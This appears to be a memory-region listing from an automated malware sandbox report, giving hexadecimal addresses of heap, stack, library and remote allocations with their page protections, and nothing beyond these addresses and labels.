remote allocation
page execute and read and write
1404FC000
remote allocation
page execute and read and write
56F0000
trusted library allocation
page execute and read and write
29A71E02000
heap
page read and write
1A9568A6000
trusted library allocation
page read and write
2F48000
trusted library allocation
page read and write
2052F863000
heap
page read and write
74F0000
trusted library allocation
page read and write
7FF7C10E4000
trusted library allocation
page read and write
296B2C32000
heap
page read and write
154E3E58000
heap
page read and write
E1A8F7F000
stack
page read and write
1B804650000
heap
page read and write
29D9000
trusted library allocation
page read and write
5C46000
trusted library allocation
page read and write
2054166B000
trusted library allocation
page read and write
1A944910000
heap
page read and write
2F61000
trusted library allocation
page read and write
205418C3000
trusted library allocation
page read and write
5F66000
trusted library allocation
page read and write
60F9000
heap
page read and write
154E3E8D000
heap
page read and write
1480000
trusted library allocation
page execute and read and write
1170000
trusted library allocation
page read and write
5700000
trusted library allocation
page read and write
20541771000
trusted library allocation
page read and write
595E000
stack
page read and write
20541811000
trusted library allocation
page read and write
20531804000
trusted library allocation
page read and write
29A0060F000
trusted library allocation
page read and write
518E000
stack
page read and write
5FAF000
heap
page read and write
20541BAD000
trusted library allocation
page read and write
5F5B000
heap
page read and write
58B6000
trusted library allocation
page read and write
1A946A73000
trusted library allocation
page read and write
14EE000
stack
page read and write
1180000
trusted library allocation
page read and write
29A73A10000
heap
page execute and read and write
1A946857000
trusted library allocation
page read and write
2053162B000
trusted library allocation
page read and write
FD0000
trusted library allocation
page read and write
E1A93FE000
stack
page read and write
F20000
trusted library allocation
page read and write
2DE2000
trusted library allocation
page read and write
1A9449B7000
heap
page read and write
2EE0000
trusted library allocation
page execute and read and write
20541843000
trusted library allocation
page read and write
1A946B3A000
trusted library allocation
page read and write
20541667000
trusted library allocation
page read and write
29A71DC0000
heap
page read and write
28624FF000
stack
page read and write
3363000
trusted library allocation
page read and write
31C6000
trusted library allocation
page read and write
15B0000
trusted library allocation
page read and write
1A946400000
heap
page read and write
15AD000
trusted library allocation
page execute and read and write
2B01000
trusted library allocation
page read and write
28BEFFE000
stack
page read and write
138E000
stack
page read and write
7FF7C10E0000
trusted library allocation
page execute and read and write
30BC000
heap
page read and write
20531918000
trusted library allocation
page read and write
12D52740000
heap
page read and write
5850000
trusted library allocation
page read and write
345D000
trusted library allocation
page read and write
215E6F0E000
heap
page read and write
59DE000
stack
page read and write
4A09000
trusted library allocation
page read and write
1A956A34000
trusted library allocation
page read and write
5E0E000
stack
page read and write
20541A76000
trusted library allocation
page read and write
29A71FE5000
heap
page read and write
3315000
trusted library allocation
page read and write
744E000
stack
page read and write
7C0000
heap
page read and write
2D79000
trusted library allocation
page read and write
1593000
trusted library allocation
page execute and read and write
32C4000
trusted library allocation
page read and write
215E6E40000
heap
page read and write
1176000
trusted library allocation
page execute and read and write
13E0000
trusted library allocation
page read and write
162A000
trusted library allocation
page execute and read and write
1A9466ED000
trusted library allocation
page read and write
7FF7C0F42000
trusted library allocation
page read and write
63D46F9000
stack
page read and write
32C9000
trusted library allocation
page read and write
30C4000
trusted library allocation
page read and write
18CE000
stack
page read and write
F10000
trusted library allocation
page read and write
75E0000
trusted library allocation
page execute and read and write
33A2000
trusted library allocation
page read and write
3A83000
trusted library allocation
page read and write
20541B34000
trusted library allocation
page read and write
29A73A22000
heap
page read and write
13ED000
trusted library allocation
page execute and read and write
5CFE000
stack
page read and write
575E000
stack
page read and write
296B4504000
trusted library allocation
page read and write
296B4151000
trusted library allocation
page read and write
32B0000
trusted library allocation
page read and write
7FF7C0FFC000
trusted library allocation
page execute and read and write
1404F2000
remote allocation
page execute and read and write
215E87CC000
trusted library allocation
page read and write
7FF7C0F24000
trusted library allocation
page read and write
1090000
heap
page read and write
A827FF000
stack
page read and write
1A956963000
trusted library allocation
page read and write
7FF7C10C5000
trusted library allocation
page read and write
30EE000
trusted library allocation
page read and write
154F5DA4000
trusted library allocation
page read and write
1A956B30000
trusted library allocation
page read and write
215E6DD0000
heap
page read and write
F86000
trusted library allocation
page read and write
5FA1000
heap
page read and write
B7D000
trusted library allocation
page execute and read and write
30D1000
trusted library allocation
page read and write
14AF000
stack
page read and write
2C5E000
trusted library allocation
page read and write
160D000
trusted library allocation
page execute and read and write
1B806360000
heap
page read and write
13F4000
trusted library allocation
page read and write
DB40872000
stack
page read and write
2F4F000
trusted library allocation
page read and write
2D8B000
trusted library allocation
page read and write
1B804762000
heap
page read and write
1B8046AC000
heap
page read and write
1A956A66000
trusted library allocation
page read and write
439A000
trusted library allocation
page read and write
75C000
stack
page read and write
5760000
trusted library allocation
page read and write
400000
remote allocation
page execute and read and write
2052F9C0000
heap
page read and write
342C000
trusted library allocation
page read and write
1402000
trusted library allocation
page read and write
2F81000
trusted library allocation
page read and write
5920000
heap
page read and write
118B000
trusted library allocation
page execute and read and write
58B9000
trusted library allocation
page read and write
291E000
stack
page read and write
309F000
trusted library allocation
page read and write
2C39000
trusted library allocation
page read and write
205313B0000
heap
page read and write
7FF7C1100000
trusted library allocation
page execute and read and write
296B32D6000
heap
page execute and read and write
140469000
remote allocation
page execute and read and write
3038000
trusted library allocation
page read and write
5B9E000
stack
page read and write
1A944920000
heap
page read and write
3528000
trusted library allocation
page read and write
1A9567C8000
trusted library allocation
page read and write
5C30000
trusted library allocation
page execute and read and write
1630000
heap
page read and write
5C80000
trusted library allocation
page execute and read and write
16B8000
heap
page read and write
10C4000
heap
page read and write
2F74000
trusted library allocation
page read and write
11A0000
trusted library allocation
page read and write
28627FF000
stack
page read and write
215E8233000
trusted library allocation
page read and write
F46000
trusted library allocation
page execute and read and write
1B8049A0000
heap
page read and write
604D000
heap
page read and write
5900000
trusted library allocation
page read and write
205318F8000
trusted library allocation
page read and write
7FF7C1170000
trusted library allocation
page read and write
2740F280000
heap
page read and write
31E3000
trusted library allocation
page read and write
DB409FF000
stack
page read and write
1260000
heap
page read and write
154E3D80000
heap
page read and write
B64000
trusted library allocation
page read and write
205319EB000
trusted library allocation
page read and write
1404E6000
remote allocation
page execute and read and write
2BC9000
trusted library allocation
page read and write
674F000
stack
page read and write
2B22000
trusted library allocation
page read and write
2F24000
trusted library allocation
page read and write
DB41A4D000
stack
page read and write
2763F688000
heap
page read and write
112C000
heap
page read and write
2763F8F5000
heap
page read and write
296B2C79000
heap
page read and write
154E3DD0000
heap
page read and write
1B806173000
heap
page read and write
154E606A000
trusted library allocation
page read and write
D8D6DFF000
stack
page read and write
34E0000
trusted library allocation
page read and write
3981000
trusted library allocation
page read and write
215E893E000
trusted library allocation
page read and write
1210000
heap
page read and write
296B46EA000
trusted library allocation
page read and write
2BD5000
trusted library allocation
page read and write
52F0000
heap
page read and write
7310000
trusted library allocation
page read and write
5A9E000
stack
page read and write
29A71F40000
trusted library allocation
page read and write
1280000
heap
page read and write
DB40DFE000
stack
page read and write
2B8D000
stack
page read and write
1A9567D2000
trusted library allocation
page read and write
30C0000
trusted library allocation
page read and write
AF7000
stack
page read and write
2FD2000
trusted library allocation
page read and write
154E4125000
heap
page read and write
FC9000
trusted library allocation
page read and write
C7349FE000
stack
page read and write
FE0000
trusted library allocation
page execute and read and write
1A94498B000
heap
page read and write
2F77000
trusted library allocation
page read and write
1404DC000
remote allocation
page execute and read and write
1960000
heap
page execute and read and write
1410000
trusted library allocation
page read and write
2C10000
trusted library allocation
page read and write
2052F980000
heap
page read and write
5FF1000
heap
page read and write
1B8049C5000
heap
page read and write
1A94689F000
trusted library allocation
page read and write
5C60000
trusted library allocation
page execute and read and write
5D50000
heap
page read and write
B97000
trusted library allocation
page execute and read and write
F7E000
stack
page read and write
12D50BF0000
heap
page read and write
7FF7C0F6B000
trusted library allocation
page execute and read and write
369F000
trusted library allocation
page read and write
1A946877000
trusted library allocation
page read and write
215E6EC8000
heap
page read and write
2C22000
trusted library allocation
page read and write
1B816511000
trusted library allocation
page read and write
310F000
trusted library allocation
page read and write
585E000
stack
page read and write
296B33B0000
heap
page execute and read and write
DB40B7A000
stack
page read and write
2F42000
trusted library allocation
page read and write
1A956D34000
trusted library allocation
page read and write
1B8046EC000
heap
page read and write
1160000
trusted library allocation
page read and write
2B35000
trusted library allocation
page read and write
28FF000
stack
page read and write
63D483E000
stack
page read and write
2C54000
trusted library allocation
page read and write
1A956AE7000
trusted library allocation
page read and write
215E855D000
trusted library allocation
page read and write
5790000
heap
page read and write
2C71000
trusted library allocation
page read and write
1A9466FA000
trusted library allocation
page read and write
2F31000
trusted library allocation
page read and write
2B09000
trusted library allocation
page read and write
205416FB000
trusted library allocation
page read and write
154FE1B0000
heap
page read and write
215E9601000
trusted library allocation
page read and write
2BC1000
trusted library allocation
page read and write
56E5000
heap
page read and write
5702000
trusted library allocation
page read and write
C9A000
heap
page read and write
1407A6000
remote allocation
page execute and read and write
F97000
stack
page read and write
12A4000
heap
page read and write
215E889F000
trusted library allocation
page read and write
126A000
heap
page read and write
2054162D000
trusted library allocation
page read and write
1A94650E000
heap
page read and write
44FC000
trusted library allocation
page read and write
7FF7C0F53000
trusted library allocation
page read and write
5944000
trusted library allocation
page read and write
1A956AEC000
trusted library allocation
page read and write
1610000
trusted library allocation
page read and write
296B3E35000
trusted library allocation
page read and write
215E90D1000
trusted library allocation
page read and write
2763FDB0000
trusted library allocation
page read and write
154FDA90000
trusted library allocation
page read and write
2E49000
trusted library allocation
page read and write
7FF7C1040000
trusted library allocation
page execute and read and write
4B2000
remote allocation
page execute and read and write
29E9000
trusted library allocation
page read and write
20541C07000
trusted library allocation
page read and write
610A000
heap
page read and write
C70000
heap
page read and write
D8D71FF000
stack
page read and write
1A946947000
trusted library allocation
page read and write
20541B6B000
trusted library allocation
page read and write
3010000
heap
page execute and read and write
1B816371000
trusted library allocation
page read and write
3467000
trusted library allocation
page read and write
1A95687C000
trusted library allocation
page read and write
There are 2107 hidden memdumps, click here to show them.